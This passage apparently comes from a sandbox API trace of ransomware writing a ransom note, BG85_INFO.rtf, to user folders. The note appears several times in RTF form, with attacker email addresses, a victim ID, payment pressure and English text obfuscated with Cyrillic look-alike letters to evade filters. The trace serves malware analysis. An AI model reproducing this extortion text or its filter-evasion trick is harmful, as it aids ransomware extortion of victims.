pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x25ad0d8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\np¿WD÷\x0fe^`Ì!II\x05\x8aUá³\x81Í|\x86e\x12 cG®n&lhkô\x09mË\x05\x9fös)$\x0bsã\x9d\x7fÉ\rý)sdÁ\x1bs0\x19­­Ê4ñAmÈ\x9b/Á\x86¶ó\x92\r\x7fËõ\x1aH\x985Z¾»}\"}Î4\x0e<,\\\x92 Ü3h¬bÖ|ÕÜ\x04õw\x16Æ\x87>²§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0078.573] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0078.575] CloseHandle (hObject=0x1dc) returned 1 [0078.575] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bg85_info.rtf")) returned 0xffffffff [0078.576] GetLastError () returned 0x2 [0078.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.577] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as 